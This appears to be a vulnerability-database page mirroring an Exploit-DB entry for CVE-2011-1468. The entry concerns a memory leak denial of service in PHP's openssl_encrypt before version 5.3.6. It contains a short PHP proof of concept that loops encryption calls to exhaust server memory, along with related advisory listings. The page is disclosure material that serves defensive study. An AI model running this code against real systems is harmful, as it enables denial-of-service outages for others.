Lucene search

K

PHP < 5.3.6 'OpenSSL' Extension - 'openssl_encrypt' Plaintext Data Memory Leak Denial of Service

πŸ—“οΈΒ 08 Mar 2011Β 00:00:00Reported byΒ dovbyshTypeΒ 
exploitdb
Β exploitdb
πŸ”—Β www.exploit-db.comπŸ‘Β 47Β Views

PHP 5.3.6 'OpenSSL' Extension - 'openssl_encrypt' Memory Leak Do

Show more
Related
Code
ReporterTitlePublishedViews
Family
Veracode
Denial Of Service (DoS)
10 Apr 202001:03
–veracode
seebug.org
PHP "OpenSSL"ζ‰©ε±•ε€šδΈͺζ‹’η»ζœεŠ‘ζΌζ΄ž
27 Mar 201100:00
–seebug
UbuntuCve
CVE-2011-1468
19 Mar 201100:00
–ubuntucve
CVE
CVE-2011-1468
20 Mar 201102:00
–cve
Prion
Design/Logic Flaw
20 Mar 201102:00
–prion
NVD
CVE-2011-1468
20 Mar 201102:00
–nvd
Cvelist
CVE-2011-1468
20 Mar 201101:00
–cvelist
Exploit DB
PHP < 5.3.6 'OpenSSL' Extension - 'openssl_decrypt' Ciphertext Data Memory Leak Denial of Service
8 Mar 201100:00
–exploitdb
OpenVAS
RedHat Update for php53 and php RHSA-2011:1423-01
3 Nov 201100:00
–openvas
OpenVAS
CentOS Update for php53 CESA-2011:1423 centos5 i386
3 Nov 201100:00
–openvas
Rows per page
source: https://www.securityfocus.com/bid/46977/info

PHP is prone to multiple remote denial-of-service vulnerabilities that affect the 'OpenSSL' extension.

Successful attacks will cause the application to consume excessive memory, creating a denial-of-service condition.

Versions prior to PHP 5.3.6 are vulnerable. 

<?php

$data = "jfdslkjvflsdkjvlkfjvlkjfvlkdm,4w 043920r 9234r 32904r 09243 r7-89437 r892374 r894372 r894 7289r7 f  frwerfh i iurf iuryw uyrfouiwy ruy 972439 8478942 yrhfjkdhls";
$pass = "r23498rui324hjbnkj";

$maxi = 200000;
$t = microtime(1);
for ($i=0;$i<$maxi; $i++){
	openssl_encrypt($data.$i, 'des3', $pass, false, '1qazxsw2');
}
$t = microtime(1)-$t;
print "mode: openssl_encrypt ($maxi) tests takes ".$t."secs ".($maxi/$t)."#/sec \n";

?>

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
08 Mar 2011 00:00Current
7.4High risk
Vulners AI Score7.4
47
.json
Report